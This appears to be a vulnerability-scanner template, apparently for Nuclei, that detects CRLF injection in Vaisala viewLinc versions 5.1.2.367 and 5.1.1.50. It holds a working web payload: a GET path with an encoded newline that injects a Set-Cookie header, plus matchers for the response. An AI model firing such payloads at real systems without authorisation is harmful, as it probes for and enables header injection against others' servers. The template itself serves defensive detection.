2021-03-15 20:00:56 +00:00
id : viewlinc-crlf-injection
info :
name : viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
author : geeknik
severity : low
2021-10-25 09:57:40 +00:00
description : The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
2022-04-22 10:38:41 +00:00
reference :
- https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
2021-03-16 08:35:20 +00:00
tags : crlf,viewlinc
2021-03-15 20:00:56 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
matchers-condition : or
matchers :
- type : word
words :
- "Server: viewLinc/5.1.2.367"
- "Set-Cookie: crlfinjection=crlfinjection"
part : header
condition : and
- type : word
words :
- "Server: viewLinc/5.1.1.50"
- "Set-Cookie: crlfinjection=crlfinjection"
part : header
condition : and